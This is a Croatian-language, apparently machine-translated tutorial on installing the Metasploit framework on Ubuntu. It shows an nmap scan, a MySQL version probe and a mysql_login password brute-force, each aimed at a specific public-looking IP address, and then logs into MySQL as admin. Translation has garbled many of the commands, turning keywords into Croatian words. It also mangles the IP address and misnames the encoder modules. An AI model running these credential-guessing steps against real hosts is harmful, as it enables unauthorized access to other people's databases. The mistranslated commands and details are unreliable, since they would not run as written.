Sadržaj
Metasploit okvir, je alat za razvoj i pokretanje exploita protiv računala ili poslužitelja. Metasploit Framework je napisan na jeziku Ruby, više je platformi i zahtijeva moćno računalo za rad, postoji plaćena verzija i besplatna verzija za zajednicu.Može se preuzeti na www.metasploit.com/framework/download
Idemo instalirati u Linux Ubutnu, ali radi za druge distrose promjenom nekih naredbi.
Pristupamo prozoru terminala i instaliramo ruby, prije nego što je radio s perlom, ali je bio programiran potpuno nov.
Instaliramo ovisnosti o rubinu kako bismo tada mogli pokrenuti okvir.
sudo apt-get install ruby libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -postavi instalaciju libiconv-ruby sudo apt-get instaliraj rubygems * sudo apt-get instaliraj libgtk2-ruby libglade2-ruby
Zatim ćemo, ovisno o verziji koju preuzimamo 32 ili 64 bitne sa terminala, dati dopuštenje:
chmod + x metasploit-latest-linux-x64-installer.run
Pokrećemo instalacijski program i otvorit će se instalacijski prozor:
sudo metasploit-latest-linux-x64-installer.run
Na kraju instalacije iz prozora terminala i s root pristupom ažuriramo okvir
sa naredbom:
msfupdate
Metasploit je program bez grafičkog okruženja koji se u potpunosti izvodi u terminalu. Softveru pristupamo s terminala naredbom:
msfconsole
Interno poznavanje MSF -a
MSF (Metasploit okvir) Strukturiran je u nizu modula kao što su:
Podvizi Koje su skripte i programi dostupni u MSF -u i koje možemo koristiti, organizirani su prema operacijskom sustavu i kategorijama, na primjer exploiti / windows / browser / koji su podvizi dostupni za preglednike koji rade na Windowsima.
Korisni tereti: Radnja će se provesti ako se ranjivost koju testiramo može pronaći i iskoristiti.
Pomoćni: pomoćne skripte s različitim funkcijama, kao što su pomoćne / skener / portcan / tcp i pomoću ovog skenera portova tcp, dobili bismo status porta. Ova je skripta alternativa Nmapu.
Odgovara: Oni kodiraju skriptu kako bi izbjegli neke antiviruse i antispammer.
Pokrećemo testni primjer s terminala koji izvršavamo:./msfconsole
Počet ćemo skeniranjem ip -a s nmapom
msf> nmap -sV 190.155.80.110
Aktiviramo pomoćni modul za pristup skriptnim alatima koji će omogućiti rad na mysqlu. Također možemo vidjeti verziju modula.
msf> pomoćni (mysql_verzija)> postavi RHOSTS 190.155.80.110 // postavi udaljeni ip msf> postavi RHOSTS 192.155.80.110 msf> pomoćni (mysql_verzija)> pokreni // provjeri verziju mysqla
Ako se izvrši ispravno, može vratiti verziju mysql:
[*] 190.155.80.110 izvodi Mysql5.0
Još jedan slučaj sa modulom za skeniranje i pokušajem promjene root korisnika mysqla:
msf> koristiti skener / mysql / mysql_login msf> postaviti USERNAME admin msf> postaviti PASS_FILE /tmp/keys.lst // tekstualna datoteka s mogućim ključevima jedan ispod drugog msf> exploit
Ako radi, možemo se prijaviti na mysql:
mysql -h 1920,155,80,110 -u admin -pkey